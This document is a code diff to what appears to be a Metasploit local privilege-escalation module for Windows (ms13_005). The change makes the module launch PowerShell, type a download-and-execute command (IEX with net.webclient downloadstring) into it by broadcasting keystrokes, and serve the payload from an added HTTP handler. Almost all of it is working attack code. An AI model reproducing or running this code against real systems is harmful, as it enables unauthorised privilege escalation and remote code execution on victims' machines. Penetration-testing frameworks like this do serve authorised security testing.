Working with psh download

modules/exploits/windows/local/ms13_005.rb

@@ -13,6 +13,7 @@ class Metasploit3 < Msf::Exploit::Local
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::EXE
+	include Msf::Exploit::Remote::HttpServer
 
 	def initialize(info={})
 		super( update_info( info,
@@ -39,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Local
 				],
 			'Platform'      => [ 'win' ],
 			'SessionTypes'  => [ 'meterpreter' ],
-			'Targets'       => 
+			'Targets'       =>
 			[
 				[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
 				[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
@@ -60,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Local
 				OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true])
 			], self.class
 		)
-	
+
 		register_advanced_options(
 			[
 				OptBool.new('EEGG', [false, '',])
@@ -70,38 +71,36 @@ class Metasploit3 < Msf::Exploit::Local
 
 	def win_shift(number)
 		vk = 0x30 + number
-		bscan = 0x81 + number	
+		bscan = 0x81 + number
 		client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
 		client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
-		sleep(0.01)
 		client.railgun.user32.keybd_event(vk, bscan, 0, 0)
-		sleep(0.01)
-	
 		client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
 		client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
 		client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
 	end
-		
+
 	def count_cmd_procs
 		count = 0
 		client.sys.process.each_process do |proc|
-			if proc['name'] == 'cmd.exe'
+			if proc['name'] == 'powershell.exe'
 				count += 1
 			end
 		end
-		
+
 		vprint_status("Cmd prompt count: #{count}")
 		return count
 	end
-	
+
 	def cleanup
 		if datastore['SPAWN_PROMPT']
 			vprint_status("Rehiding window...")
-			client.railgun.user32.ShowWindow(@hwin, 0)
+			#client.railgun.user32.ShowWindow(@hwin, 0)
 		end
 	end
 
-	def exploit
+	def primer
+		start_service
 		# syinfo is only on meterpreter sessions
 		e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg=="
 		print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
@@ -111,14 +110,14 @@ class Metasploit3 < Msf::Exploit::Local
 			if @hwin == nil
 				@hwin = client.railgun.user32.GetForegroundWindow()['return']
 			end
-			#client.railgun.user32.ShowWindow(@hwin, 0)
-			#client.railgun.user32.ShowWindow(@hwin, 5)
+			client.railgun.user32.ShowWindow(@hwin, 0)
+			client.railgun.user32.ShowWindow(@hwin, 5)
 
 			# Spawn low integrity cmd.exe
 			print_status("Spawning Low Integrity Cmd Prompt")
 			windir = client.fs.file.expand_path("%windir%")
-			li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
-		
+			li_cmd_pid = client.sys.process.execute("powershell.exe", nil, {'Hidden' => false }).pid
+
 			count = count_cmd_procs
 			spawned = false
 			# Bruteforce taskbar position Win+Shift+?
@@ -139,17 +138,26 @@ class Metasploit3 < Msf::Exploit::Local
 
 			fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned
 		end
-	
+
 		print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
-		payload = Rex::Text.decode_base64(e) if datastore['EEGG']
-		payload.each_char do |c|
-			print c
+		data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+		url = get_uri()
+		download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
+		command = download_and_run
+		command = Rex::Text.decode_base64(e) if datastore['EEGG']
+		command.each_char do |c|
+			print c if command.length < 200
 			client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
-			sleep(0.01)
 		end
-		print_line	
+		print_line
 		print_status("Executing command...")
 		client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
 	end
+
+	def on_request_uri(cli, request)
+		print_status("Delivering Payload")
+		data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+		send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+	end
 end